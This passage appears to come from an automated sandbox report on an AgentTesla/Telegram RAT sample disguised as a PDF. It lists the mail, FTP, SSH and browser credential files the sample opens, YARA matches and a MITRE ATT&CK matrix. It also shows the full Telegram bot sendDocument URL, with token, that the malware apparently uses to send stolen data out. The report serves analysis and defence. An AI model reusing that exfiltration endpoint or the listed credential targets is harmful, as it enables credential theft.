                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\CustomMarshalers\v4.0_4.0.0.0__b03f5f7f11d50a3a\CustomMarshalers.dll VolumeInformationJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\CustomMarshalers\v4.0_4.0.0.0__b03f5f7f11d50a3a\CustomMarshalers.dll VolumeInformationJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\CustomMarshalers\v4.0_4.0.0.0__b03f5f7f11d50a3a\CustomMarshalers.dll VolumeInformationJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll VolumeInformationJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\20220114080343434.pdf.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

                      Stealing of Sensitive Information:

                      barindex
                      Yara detected Telegram RATShow sources
                      Source: Yara matchFile source: 00000009.00000002.558108982.0000000003141000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: 20220114080343434.pdf.exe PID: 7036, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: RegSvcs.exe PID: 6540, type: MEMORYSTR
                      Yara detected AgentTeslaShow sources
                      Source: Yara matchFile source: 9.0.RegSvcs.exe.400000.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 9.0.RegSvcs.exe.400000.4.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 9.0.RegSvcs.exe.400000.3.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 1.2.20220114080343434.pdf.exe.3a0ff28.4.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 9.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 9.0.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 1.2.20220114080343434.pdf.exe.39a4280.3.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 9.0.RegSvcs.exe.400000.2.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 1.2.20220114080343434.pdf.exe.3a0ff28.4.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 1.2.20220114080343434.pdf.exe.39a4280.3.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 00000009.00000000.304424534.0000000000402000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000009.00000000.303933701.0000000000402000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000009.00000000.303119673.0000000000402000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000009.00000000.303547707.0000000000402000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000001.00000002.306687989.00000000038B9000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000009.00000002.548274653.0000000000402000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000001.00000002.306874211.0000000003A0F000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000009.00000002.558557812.000000000344E000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000009.00000002.558108982.0000000003141000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: 20220114080343434.pdf.exe PID: 7036, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: RegSvcs.exe PID: 6540, type: MEMORYSTR
                      Tries to steal Mail credentials (via file / registry access)Show sources
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.iniJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.iniJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeKey opened: HKEY_CURRENT_USER\Software\IncrediMail\IdentitiesJump to behavior
                      Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)Show sources
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Martin Prikryl\WinSCP 2\SessionsJump to behavior
                      Tries to harvest and steal ftp login credentialsShow sources
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Roaming\SmartFTP\Client 2.0\Favorites\Quick Connect\Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Roaming\FileZilla\recentservers.xmlJump to behavior
                      Tries to harvest and steal browser information (history, passwords, etc)Show sources
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.iniJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
                      Source: Yara matchFile source: 00000009.00000002.558108982.0000000003141000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: RegSvcs.exe PID: 6540, type: MEMORYSTR

                      Remote Access Functionality:

                      barindex
                      Yara detected Telegram RATShow sources
                      Source: Yara matchFile source: 00000009.00000002.558108982.0000000003141000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: 20220114080343434.pdf.exe PID: 7036, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: RegSvcs.exe PID: 6540, type: MEMORYSTR
                      Yara detected AgentTeslaShow sources
                      Source: Yara matchFile source: 9.0.RegSvcs.exe.400000.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 9.0.RegSvcs.exe.400000.4.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 9.0.RegSvcs.exe.400000.3.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 1.2.20220114080343434.pdf.exe.3a0ff28.4.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 9.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 9.0.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 1.2.20220114080343434.pdf.exe.39a4280.3.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 9.0.RegSvcs.exe.400000.2.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 1.2.20220114080343434.pdf.exe.3a0ff28.4.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 1.2.20220114080343434.pdf.exe.39a4280.3.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 00000009.00000000.304424534.0000000000402000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000009.00000000.303933701.0000000000402000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000009.00000000.303119673.0000000000402000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000009.00000000.303547707.0000000000402000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000001.00000002.306687989.00000000038B9000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000009.00000002.548274653.0000000000402000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000001.00000002.306874211.0000000003A0F000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000009.00000002.558557812.000000000344E000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000009.00000002.558108982.0000000003141000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: 20220114080343434.pdf.exe PID: 7036, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: RegSvcs.exe PID: 6540, type: MEMORYSTR

                      Mitre Att&ck Matrix

                      Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
                      Valid AccountsWindows Management Instrumentation211Path InterceptionProcess Injection312Masquerading11OS Credential Dumping2Security Software Discovery211Remote ServicesEmail Collection1Exfiltration Over Other Network MediumWeb Service1Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
                      Default AccountsScheduled Task/JobBoot or Logon Initialization ScriptsBoot or Logon Initialization ScriptsDisable or Modify Tools1Credentials in Registry1Process Discovery2Remote Desktop ProtocolArchive Collected Data11Exfiltration Over BluetoothEncrypted Channel11Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
                      Domain AccountsAt (Linux)Logon Script (Windows)Logon Script (Windows)Virtualization/Sandbox Evasion131Security Account ManagerVirtualization/Sandbox Evasion131SMB/Windows Admin SharesData from Local System2Automated ExfiltrationNon-Application Layer Protocol2Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
                      Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)Process Injection312NTDSApplication Window Discovery1Distributed Component Object ModelInput CaptureScheduled TransferApplication Layer Protocol3SIM Card SwapCarrier Billing Fraud
                      Cloud AccountsCronNetwork Logon ScriptNetwork Logon ScriptDeobfuscate/Decode Files or Information1LSA SecretsRemote System Discovery1SSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
                      Replication Through Removable MediaLaunchdRc.commonRc.commonObfuscated Files or Information12Cached Domain CredentialsSystem Information Discovery114VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
                      External Remote ServicesScheduled TaskStartup ItemsStartup ItemsSoftware Packing23DCSyncNetwork SniffingWindows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact

                      Behavior Graph

                      Screenshots

                      Thumbnails

                      This section contains all screenshots as thumbnails, including those not shown in the slideshow.

                      windows-stand

                      Antivirus, Machine Learning and Genetic Malware Detection

                      Initial Sample

                      SourceDetectionScannerLabelLink
                      20220114080343434.pdf.exe100%Joe Sandbox ML

                      Dropped Files

                      No Antivirus matches

                      Unpacked PE Files

                      SourceDetectionScannerLabelLinkDownload
                      9.0.RegSvcs.exe.400000.3.unpack100%AviraTR/Spy.Gen8Download File
                      9.0.RegSvcs.exe.400000.4.unpack100%AviraTR/Spy.Gen8Download File
                      9.0.RegSvcs.exe.400000.2.unpack100%AviraTR/Spy.Gen8Download File
                      9.0.RegSvcs.exe.400000.1.unpack100%AviraTR/Spy.Gen8Download File
                      9.0.RegSvcs.exe.400000.0.unpack100%AviraTR/Spy.Gen8Download File
                      9.2.RegSvcs.exe.400000.0.unpack100%AviraTR/Spy.Gen8Download File

                      Domains

                      No Antivirus matches

                      URLs

                      SourceDetectionScannerLabelLink
                      http://127.0.0.1:HTTP/1.10%Avira URL Cloudsafe
                      http://en.wE0%Avira URL Cloudsafe
                      http://www.fontbureau.comd10%Avira URL Cloudsafe
                      http://www.sajatypeworks.com20%URL Reputationsafe
                      http://www.sajatypeworks.comeu0%Avira URL Cloudsafe
                      http://www.founder.com.cn/cn/bThe0%URL Reputationsafe
                      http://www.fontbureau.comalict0%Avira URL Cloudsafe
                      http://www.tiro.com0%URL Reputationsafe
                      http://www.fontbureau.comessed0%URL Reputationsafe
                      http://www.goodfont.co.kr0%URL Reputationsafe
                      http://UeFrqT.com0%Avira URL Cloudsafe
                      http://www.fontbureau.comt:0%Avira URL Cloudsafe
                      http://www.sajatypeworks.com0%URL Reputationsafe
                      http://www.typography.netD0%URL Reputationsafe
                      http://www.founder.com.cn/cn/cThe0%URL Reputationsafe
                      http://www.galapagosdesign.com/staff/dennis.htm0%URL Reputationsafe
                      http://fontfabrik.com0%URL Reputationsafe
                      http://www.fontbureau.comgrita0%URL Reputationsafe
                      http://www.founder.com.cn/cnl-g0%URL Reputationsafe
                      https://api.telegram.org40%URL Reputationsafe
                      http://www.founder.com.cn/cnu0%URL Reputationsafe
                      http://www.galapagosdesign.com/DPlease0%URL Reputationsafe
                      http://www.fontbureau.comtto0%Avira URL Cloudsafe
                      https://api.ipify.org%GETMozilla/5.00%URL Reputationsafe
                      http://www.sandoll.co.kr0%URL Reputationsafe
                      http://www.urwpp.deDPlease0%URL Reputationsafe
                      http://www.jiyu-kobo.co.jp//ft0%Avira URL Cloudsafe
                      http://www.zhongyicts.com.cn0%URL Reputationsafe
                      http://www.sakkal.com0%URL Reputationsafe
                      http://www.fontbureau.comtoTF0%Avira URL Cloudsafe
                      https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip0%URL Reputationsafe
                      http://www.sakkal.comrmx0%Avira URL Cloudsafe
                      http://DynDns.comDynDNS0%URL Reputationsafe
                      http://www.fontbureau.comF0%URL Reputationsafe
                      https://mVBubsTSBV2T9Joj.org0%Avira URL Cloudsafe
                      https://mVBubsTSBV2T9Joj.org(0%Avira URL Cloudsafe
                      https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip%tordir%%ha0%URL Reputationsafe
                      http://www.founder.com.cn/cnres0%Avira URL Cloudsafe
                      http://www.fontbureau.comdf0%Avira URL Cloudsafe
                      http://www.sakkal.com-iX0%Avira URL Cloudsafe
                      http://en.wikipedia0%URL Reputationsafe
                      http://www.fontbureau.comtuet:0%Avira URL Cloudsafe
                      http://www.jiyu-kobo.co.jp/jp/0%URL Reputationsafe
                      http://www.fontbureau.comd0%URL Reputationsafe
                      http://www.founder.com.cn/cncr;0%Avira URL Cloudsafe
                      https://api.ipify.org%$0%Avira URL Cloudsafe
                      http://www.carterandcone.coml0%URL Reputationsafe
                      http://www.founder.com.cn/cn0%URL Reputationsafe
                      http://www.jiyu-kobo.co.jp/jp/#0%URL Reputationsafe
                      http://www.jiyu-kobo.co.jp/o0%URL Reputationsafe
                      http://www.jiyu-kobo.co.jp/0%URL Reputationsafe
                      http://www.fontbureau.como0%URL Reputationsafe
                      http://www.founder.com.cn/cnu-h0%Avira URL Cloudsafe
                      http://www.fontbureau.comrsivo0%Avira URL Cloudsafe
                      http://www.jiyu-kobo.co.jp/oby0%Avira URL Cloudsafe

                      Domains and IPs

                      Contacted Domains

                      NameIPActiveMaliciousAntivirus DetectionReputation
                      api.telegram.org
                      149.154.167.220
                      truefalse
                        high

                        Contacted URLs

                        NameMaliciousAntivirus DetectionReputation
                        https://api.telegram.org/bot2122434962:AAFqluKwJfwmfN8BZ9xq0IjlIijJbDmwbKs/sendDocumentfalse
                          high

                          URLs from Memory and Binaries

                          NameSourceMaliciousAntivirus DetectionReputation
                          http://127.0.0.1:HTTP/1.1RegSvcs.exe, 00000009.00000002.558108982.0000000003141000.00000004.00000001.sdmpfalse
                          • Avira URL Cloud: safe
                          low
                          http://www.fontbureau.com/designersG20220114080343434.pdf.exe, 00000001.00000002.308765282.00000000069D2000.00000004.00000001.sdmpfalse
                            high
                            http://en.wE20220114080343434.pdf.exe, 00000001.00000003.284299780.0000000005746000.00000004.00000001.sdmpfalse
                            • Avira URL Cloud: safe
                            unknown
                            http://www.fontbureau.comd120220114080343434.pdf.exe, 00000001.00000003.291433983.000000000574E000.00000004.00000001.sdmp, 20220114080343434.pdf.exe, 00000001.00000003.291064337.000000000574D000.00000004.00000001.sdmp, 20220114080343434.pdf.exe, 00000001.00000003.291333441.000000000574C000.00000004.00000001.sdmp, 20220114080343434.pdf.exe, 00000001.00000003.291019852.000000000574C000.00000004.00000001.sdmpfalse
                            • Avira URL Cloud: safe
                            unknown
                            http://www.sajatypeworks.com220220114080343434.pdf.exe, 00000001.00000003.284070173.000000000575B000.00000004.00000001.sdmp, 20220114080343434.pdf.exe, 00000001.00000003.285161013.000000000575B000.00000004.00000001.sdmp, 20220114080343434.pdf.exe, 00000001.00000003.285111629.000000000575B000.00000004.00000001.sdmp, 20220114080343434.pdf.exe, 00000001.00000003.285961664.000000000575B000.00000004.00000001.sdmp, 20220114080343434.pdf.exe, 00000001.00000003.285793517.000000000575B000.00000004.00000001.sdmp, 20220114080343434.pdf.exe, 00000001.00000003.285293155.000000000575B000.00000004.00000001.sdmp, 20220114080343434.pdf.exe, 00000001.00000003.285058740.000000000575B000.00000004.00000001.sdmp, 20220114080343434.pdf.exe, 00000001.00000003.284214946.000000000575B000.00000004.00000001.sdmp, 20220114080343434.pdf.exe, 00000001.00000003.284952732.000000000575B000.00000004.00000001.sdmp, 20220114080343434.pdf.exe, 00000001.00000003.286439640.000000000575B000.00000004.00000001.sdmp, 20220114080343434.pdf.exe, 00000001.00000003.286763266.000000000575B000.00000004.00000001.sdmp, 20220114080343434.pdf.exe, 00000001.00000003.285399043.000000000575B000.00000004.00000001.sdmp, 20220114080343434.pdf.exe, 00000001.00000003.287251981.000000000575B000.00000004.00000001.sdmp, 20220114080343434.pdf.exe, 00000001.00000003.287529116.000000000575B000.00000004.00000001.sdmp, 20220114080343434.pdf.exe, 00000001.00000003.284121975.000000000575B000.00000004.00000001.sdmp, 20220114080343434.pdf.exe, 00000001.00000003.284933681.000000000575B000.00000004.00000001.sdmp, 20220114080343434.pdf.exe, 00000001.00000003.285324514.000000000575B000.00000004.00000001.sdmp, 20220114080343434.pdf.exe, 00000001.00000003.285374134.000000000575B000.00000004.00000001.sdmp, 20220114080343434.pdf.exe, 00000001.00000003.284765543.000000000575B000.00000004.00000001.sdmp, 20220114080343434.pdf.exe, 00000001.00000003.285354419.000000000575B000.00000004.00000001.sdmp, 20220114080343434.pdf.exe, 00000001.00000003.284255106.000000000575B000.00000004.00000001.sdmp, 20220114080343434.pdf.exe, 00000001.00000003.285420297.000000000575B000.00000004.00000001.sdmp, 20220114080343434.pdf.exe, 00000001.00000003.287326441.000000000575B000.00000004.00000001.sdmp, 20220114080343434.pdf.exe, 00000001.00000003.287434034.000000000575B000.00000004.00000001.sdmp, 20220114080343434.pdf.exe, 00000001.00000003.285188900.000000000575B000.00000004.00000001.sdmp, 20220114080343434.pdf.exe, 00000001.00000003.286611235.000000000575B000.00000004.00000001.sdmp, 20220114080343434.pdf.exe, 00000001.00000003.285434027.000000000575B000.00000004.00000001.sdmp, 20220114080343434.pdf.exe, 00000001.00000003.287159497.000000000575B000.00000004.00000001.sdmp, 20220114080343434.pdf.exe, 00000001.00000003.286188290.000000000575B000.00000004.00000001.sdmp, 20220114080343434.pdf.exe, 00000001.00000003.285233567.000000000575B000.00000004.00000001.sdmp, 20220114080343434.pdf.exe, 00000001.00000003.285483737.000000000575B000.00000004.00000001.sdmp, 20220114080343434.pdf.exe, 00000001.00000003.284391361.000000000575B000.00000004.00000001.sdmp, 20220114080343434.pdf.exe, 00000001.00000003.286700925.000000000575B000.00000004.00000001.sdmp, 20220114080343434.pdf.exe, 00000001.00000003.284980871.000000000575B000.00000004.00000001.sdmp, 20220114080343434.pdf.exe, 00000001.00000003.284169771.000000000575B000.00000004.00000001.sdmp, 20220114080343434.pdf.exe, 00000001.00000003.284313551.000000000575B000.00000004.00000001.sdmp, 20220114080343434.pdf.exe, 00000001.00000003.285598966.000000000575B000.00000004.00000001.sdmp, 20220114080343434.pdf.exe, 00000001.00000003.284902558.000000000575B000.00000004.00000001.sdmp, 20220114080343434.pdf.exe, 00000001.00000003.286321696.000000000575B000.00000004.00000001.sdmp, 20220114080343434.pdf.exe, 00000001.00000003.285564698.000000000575B000.00000004.00000001.sdmp, 20220114080343434.pdf.exe, 00000001.00000003.287504784.000000000575B000.00000004.00000001.sdmpfalse
                            • URL Reputation: safe
                            unknown
                            http://www.fontbureau.com/designers/?20220114080343434.pdf.exe, 00000001.00000002.308765282.00000000069D2000.00000004.00000001.sdmpfalse
                              high
                              http://www.sajatypeworks.comeu20220114080343434.pdf.exe, 00000001.00000003.285161013.000000000575B000.00000004.00000001.sdmp, 20220114080343434.pdf.exe, 00000001.00000003.285111629.000000000575B000.00000004.00000001.sdmp, 20220114080343434.pdf.exe, 00000001.00000003.285961664.000000000575B000.00000004.00000001.sdmp, 20220114080343434.pdf.exe, 00000001.00000003.285793517.000000000575B000.00000004.00000001.sdmp, 20220114080343434.pdf.exe, 00000001.00000003.285293155.000000000575B000.00000004.00000001.sdmp, 20220114080343434.pdf.exe, 00000001.00000003.285058740.000000000575B000.00000004.00000001.sdmp, 20220114080343434.pdf.exe, 00000001.00000003.284214946.000000000575B000.00000004.00000001.sdmp, 20220114080343434.pdf.exe, 00000001.00000003.284952732.000000000575B000.00000004.00000001.sdmp, 20220114080343434.pdf.exe, 00000001.00000003.286439640.000000000575B000.00000004.00000001.sdmp, 20220114080343434.pdf.exe, 00000001.00000003.286763266.000000000575B000.00000004.00000001.sdmp, 20220114080343434.pdf.exe, 00000001.00000003.285399043.000000000575B000.00000004.00000001.sdmp, 20220114080343434.pdf.exe, 00000001.00000003.287251981.000000000575B000.00000004.00000001.sdmp, 20220114080343434.pdf.exe, 00000001.00000003.287529116.000000000575B000.00000004.00000001.sdmp, 20220114080343434.pdf.exe, 00000001.00000003.284933681.000000000575B000.00000004.00000001.sdmp, 20220114080343434.pdf.exe, 00000001.00000003.285324514.000000000575B000.00000004.00000001.sdmp, 20220114080343434.pdf.exe, 00000001.00000003.285374134.000000000575B000.00000004.00000001.sdmp, 20220114080343434.pdf.exe, 00000001.00000003.284765543.000000000575B000.00000004.00000001.sdmp, 20220114080343434.pdf.exe, 00000001.00000003.285354419.000000000575B000.00000004.00000001.sdmp, 20220114080343434.pdf.exe, 00000001.00000003.284255106.000000000575B000.00000004.00000001.sdmp, 20220114080343434.pdf.exe, 00000001.00000003.285420297.000000000575B000.00000004.00000001.sdmp, 20220114080343434.pdf.exe, 00000001.00000003.287326441.000000000575B000.00000004.00000001.sdmp, 20220114080343434.pdf.exe, 00000001.00000003.287434034.000000000575B000.00000004.00000001.sdmp, 20220114080343434.pdf.exe, 00000001.00000003.285188900.000000000575B000.00000004.00000001.sdmp, 20220114080343434.pdf.exe, 00000001.00000003.286611235.000000000575B000.00000004.00000001.sdmp, 20220114080343434.pdf.exe, 00000001.00000003.285434027.000000000575B000.00000004.00000001.sdmp, 20220114080343434.pdf.exe, 00000001.00000003.287159497.000000000575B000.00000004.00000001.sdmp, 20220114080343434.pdf.exe, 00000001.00000003.286188290.000000000575B000.00000004.00000001.sdmp, 20220114080343434.pdf.exe, 00000001.00000003.285233567.000000000575B000.00000004.00000001.sdmp, 20220114080343434.pdf.exe, 00000001.00000003.285483737.000000000575B000.00000004.00000001.sdmp, 20220114080343434.pdf.exe, 00000001.00000003.284391361.000000000575B000.00000004.00000001.sdmp, 20220114080343434.pdf.exe, 00000001.00000003.286700925.000000000575B000.00000004.00000001.sdmp, 20220114080343434.pdf.exe, 00000001.00000003.284980871.000000000575B000.00000004.00000001.sdmp, 20220114080343434.pdf.exe, 00000001.00000003.284169771.000000000575B000.00000004.00000001.sdmp, 20220114080343434.pdf.exe, 00000001.00000003.284313551.000000000575B000.00000004.00000001.sdmp, 20220114080343434.pdf.exe, 00000001.00000003.285598966.000000000575B000.00000004.00000001.sdmp, 20220114080343434.pdf.exe, 00000001.00000003.284902558.000000000575B000.00000004.00000001.sdmp, 20220114080343434.pdf.exe, 00000001.00000003.286321696.000000000575B000.00000004.00000001.sdmp, 20220114080343434.pdf.exe, 00000001.00000003.285564698.000000000575B000.00000004.00000001.sdmp, 20220114080343434.pdf.exe, 00000001.00000003.287504784.000000000575B000.00000004.00000001.sdmpfalse
                              • Avira URL Cloud: safe
                              unknown
                              http://www.founder.com.cn/cn/bThe20220114080343434.pdf.exe, 00000001.00000002.308765282.00000000069D2000.00000004.00000001.sdmpfalse
                              • URL Reputation: safe
                              unknown
                              https://api.telegram.orgRegSvcs.exe, 00000009.00000002.558653484.00000000034A5000.00000004.00000001.sdmpfalse
                                high
                                http://www.fontbureau.comalict20220114080343434.pdf.exe, 00000001.00000003.291064337.000000000574D000.00000004.00000001.sdmpfalse
                                • Avira URL Cloud: safe
                                unknown
                                http://www.fontbureau.com/designers?20220114080343434.pdf.exe, 00000001.00000002.308765282.00000000069D2000.00000004.00000001.sdmpfalse
                                  high
                                  http://www.tiro.com20220114080343434.pdf.exe, 00000001.00000002.308765282.00000000069D2000.00000004.00000001.sdmpfalse
                                  • URL Reputation: safe
                                  unknown
                                  http://www.fontbureau.com/designers20220114080343434.pdf.exe, 00000001.00000002.308765282.00000000069D2000.00000004.00000001.sdmpfalse
                                    high
                                    http://www.fontbureau.comessed20220114080343434.pdf.exe, 00000001.00000003.291433983.000000000574E000.00000004.00000001.sdmp, 20220114080343434.pdf.exe, 00000001.00000003.291064337.000000000574D000.00000004.00000001.sdmp, 20220114080343434.pdf.exe, 00000001.00000003.291333441.000000000574C000.00000004.00000001.sdmp, 20220114080343434.pdf.exe, 00000001.00000003.291019852.000000000574C000.00000004.00000001.sdmpfalse
                                    • URL Reputation: safe
                                    unknown
                                    http://www.goodfont.co.kr20220114080343434.pdf.exe, 00000001.00000002.308765282.00000000069D2000.00000004.00000001.sdmpfalse
                                    • URL Reputation: safe
                                    unknown
                                    http://UeFrqT.comRegSvcs.exe, 00000009.00000002.558108982.0000000003141000.00000004.00000001.sdmpfalse
                                    • Avira URL Cloud: safe
                                    unknown
                                    http://www.fontbureau.comt:20220114080343434.pdf.exe, 00000001.00000003.291433983.000000000574E000.00000004.00000001.sdmpfalse
                                    • Avira URL Cloud: safe
                                    unknown
                                    http://www.sajatypeworks.com20220114080343434.pdf.exe, 00000001.00000003.284070173.000000000575B000.00000004.00000001.sdmp, 20220114080343434.pdf.exe, 00000001.00000003.285161013.000000000575B000.00000004.00000001.sdmp, 20220114080343434.pdf.exe, 00000001.00000003.285111629.000000000575B000.00000004.00000001.sdmp, 20220114080343434.pdf.exe, 00000001.00000003.285961664.000000000575B000.00000004.00000001.sdmp, 20220114080343434.pdf.exe, 00000001.00000003.285793517.000000000575B000.00000004.00000001.sdmp, 20220114080343434.pdf.exe, 00000001.00000003.285293155.000000000575B000.00000004.00000001.sdmp, 20220114080343434.pdf.exe, 00000001.00000003.285058740.000000000575B000.00000004.00000001.sdmp, 20220114080343434.pdf.exe, 00000001.00000003.284214946.000000000575B000.00000004.00000001.sdmp, 20220114080343434.pdf.exe, 00000001.00000003.284952732.000000000575B000.00000004.00000001.sdmp, 20220114080343434.pdf.exe, 00000001.00000003.286439640.000000000575B000.00000004.00000001.sdmp, 20220114080343434.pdf.exe, 00000001.00000003.286763266.000000000575B000.00000004.00000001.sdmp, 20220114080343434.pdf.exe, 00000001.00000003.285399043.000000000575B000.00000004.00000001.sdmp, 20220114080343434.pdf.exe, 00000001.00000002.308765282.00000000069D2000.00000004.00000001.sdmp, 20220114080343434.pdf.exe, 00000001.00000003.287251981.000000000575B000.00000004.00000001.sdmp, 20220114080343434.pdf.exe, 00000001.00000003.287529116.000000000575B000.00000004.00000001.sdmp, 20220114080343434.pdf.exe, 00000001.00000003.284121975.000000000575B000.00000004.00000001.sdmp, 20220114080343434.pdf.exe, 00000001.00000003.284933681.000000000575B000.00000004.00000001.sdmp, 20220114080343434.pdf.exe, 00000001.00000003.285324514.000000000575B000.00000004.00000001.sdmp, 20220114080343434.pdf.exe, 00000001.00000003.285374134.000000000575B000.00000004.00000001.sdmp, 20220114080343434.pdf.exe, 00000001.00000003.284765543.000000000575B000.00000004.00000001.sdmp, 20220114080343434.pdf.exe, 00000001.00000003.285354419.000000000575B000.00000004.00000001.sdmp, 20220114080343434.pdf.exe, 00000001.00000003.284255106.000000000575B000.00000004.00000001.sdmp, 20220114080343434.pdf.exe, 00000001.00000003.285420297.000000000575B000.00000004.00000001.sdmp, 20220114080343434.pdf.exe, 00000001.00000003.287326441.000000000575B000.00000004.00000001.sdmp, 20220114080343434.pdf.exe, 00000001.00000003.287434034.000000000575B000.00000004.00000001.sdmp, 20220114080343434.pdf.exe, 00000001.00000003.285188900.000000000575B000.00000004.00000001.sdmp, 20220114080343434.pdf.exe, 